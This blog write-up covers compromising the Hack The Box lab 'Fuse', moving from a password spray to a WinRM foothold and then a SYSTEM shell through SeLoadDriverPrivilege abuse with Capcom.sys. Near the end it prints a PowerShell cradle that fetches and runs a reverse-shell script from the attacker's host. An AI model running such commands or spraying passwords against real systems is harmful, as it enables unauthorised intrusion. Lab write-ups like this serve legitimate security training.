Target Experience:

My observations while working this target:

· Enumeration: Life-like

· Vulnerabilities: Life-like

· Exploitation: Life-like

· Foothold Difficulty: Medium

· Privilege Escalation Difficulty: Easy/Medium

Tools:

The recommended tools for this lab were:

· Nmap

· CrackmapExec

· Web Browser

· HashCat

· SMBPasswd

· RPCClient

· Evil-WinRM

· Visual Studio 19 (on Windows)

· NetCat

· HTTP Server

Vulnerabilities:

· Exposed Username(s)

· Weak Password

· Cleartext Password

· Privilege Abuse

Information Gathering:

Using Nmap, I saved the output while scanning for service version detection, OS detection, script scanning, and verbose mode of the target system.

Figure 1: Nmap Scan

Since the target was identified as a Windows system, and most likely a domain controller, I decided to use CrackMapExec to further enumerate SMB and LDAP.

Figure 2: CrackMapExec SMB Enumeration
Figure 3: CME LDAP Enumeration

For a sanity check, I decided to use Impacket tools to validate the findings from CrackMapExec.

Figure 4: Failed LDAP Enumeration

Having no luck with enumerating SMB nor LDAP, I decided to launch a browser and investigate. However, using only the IP Address yielded no results. So, I added a hostname and the domain name into my Attacker system /etc/hosts file.

I then returned to the browser and used the FQDN and successfully established a connection to the Web Server. As I continued to investigate the web page, I clicked on one of the View hyperlinks; which opened another page that contained usernames within the printer logs.

I reviewed all three View hyperlinks to gather additional exposed usernames.

Figure 5: Default Web Page
Figure 6: Exposed Usernames

Foothold:

After gathering the usernames, I decided that I would try to password spray the target; even though I was not able to obtain the password lockout policy.

As to the password list, I decided to use the common weak passwords of seasons, months, password, machine name, and domain name. I then created a for loop that added 2020, as well as an !, to create an additional password set.

Next, I used HashCat to mangle the list with two rules; while removing passwords that were less than 8 characters in length.

Figure 7: Original Password List
Figure 8: For Loop & Hashcat
Figure 9: Snip of Final Password List

After about 20+ minutes, CrackMapExec returned the following match.

Figure 10: Spraying Results

Note: I probably should have started out with a smaller password list to conserve time.

Next, I used the found credentials to see if I could gain any more insight using CrackMapExec.

Figure 11: SMB & WinRM Results

Knowing that I identified that the account required a credential change, I used SMBPasswd to change the credentials for the tlavel account. Once changed, I then executed RPCClient with the new credentials.

Figure 12: smbpasswd & rpcclient

The above combination of SMBPasswd and RPCClient were successful when I was creating this writeup. However, when I was working the target, I kept encountering a login failure after changing the password. And yes, I used a different password combination each time I successfully changed the password.

Figure 13: Failed Logon

Originally, this part felt a little CTF’ish to me. But, I understood that the Fuse author had to make sure that others working on the HTB Free version were not impacted by password changes based on the original password spraying results.

That said, I decided to create a script (script.sh) to automate the SMBPasswd and RPCClient process. The script would be quicker than I could type and would provide me basic enumeration of the target. In addition to the script.sh, I created an auth.in file to automate the RPCClient login process, as well as executing commands for basic enumeration.

Figure 14: script.sh & auth.in

Reviewing the screen output of the RPCClient results, I noticed a cleartext password within the HP-MFT01 printer description.

Figure 15: Cleartext Password — RPCClient (enumprinters)

After obtaining the cleartext password and additional users from the RPCClient enumeration, I modified my userlist.txt and then launched a password spraying attack with CrackMapExec.

Figure 16: Password Spraying

Once I obtained the new credentials, I once again used CrackMapExec to test access for a WinRM session.

Figure 17: Validated WinRM Access

Next, I launched EvilWinRM with the obtained credentials and was able to successfully establish a foothold.

Figure 18: User Shell (svc-print)

Privilege Escalation:

After establishing a foothold, I started to enumerate the target. Interestingly, I have not seen the SeLoadDriverPrivilege enabled for a service account. So, I performed an Internet based search for “SeLoadDriverPrivilege abuse” and found a few articles that provided details for a privilege escalation.

Figure 19: Privilege to Abuse

Completing my review of the documents, I downloaded the two GitHub repositories and the linked Capcom.sys file. Next, I launched Visual Studio on my Windows 10 system and created a new CMD project for EoPLoadDriver.cpp.

After reviewing the code and making no changes, I decided to build the project. However, I had an issue during the compiling process. After doing a little research, Visual Studio seems to append the following line of code: #include “stafx.h“ for a precompiled header. Since the code was not that large, and not caring about compiling speed, I removed that line and recompiled without issue.

Figure 20: EoPLoadDriver.cpp

Next, I opened the ExploitCapcom project and reviewed the code. Based on the documentation, as well as the code, this exploit is normally launched when one has an RDP or GUI session. Since I only had a shell, I would not be able to launch a second shell within WinRM. So, I modified the code to call a BAT file verses executing CMD.exe.

Once the modification was made, I rebuilt the project as a release.

Figure 21: ExploitCapcom.cpp

With both of the C++ projects compiled as Windows binaries, I copied them to my Attacker system in the same directory where I previously copied Capcom.sys. I then created the referenced exploit.bat file (see ExploitCapcom.cpp) with a PowerShell Cradle.

powershell.exe iex (iwr http://10.10.15.111/Invoke-RS.ps1 -UseBasicParsing);

Using WinRM’s builtin upload function, I uploaded all four files to the current working directory. Once the files were uploaded, I used the EoPLoadDriver instructions from the GitHub page to execute the SeLoadDriverPrivilege abuse with the Capcom.sys file.

Figure 22: Successfully Abused Privilege

Next, I launched both NetCat and a Python HTTP Server on my attacker system. Once established, I then executed the ExploitCapcom.exe binary on the target system.

Figure 23: Executed Exploit

Within seconds, the exploit called the BAT file; which executed the PowerShell Cradle and established a reverse shell to my Attacker system.

Figure 24: Priv Esc Shell (SYSTEM)

References:

https://www.youtube.com/watch?v=H9FcE_FMZio&t=730

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

https://github.com/TarlogicSecurity/EoPLoadDriver/

https://github.com/tandasat/ExploitCapcom

Disclaimer:

This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.

Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose. Furthermore, the author is not liable for any direct or indirect damages or expense incurred which may result from the use of the information covered within this article.

Information within this article is “as is”, without warranty of any sort.

Cyber Security Enthusiast

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store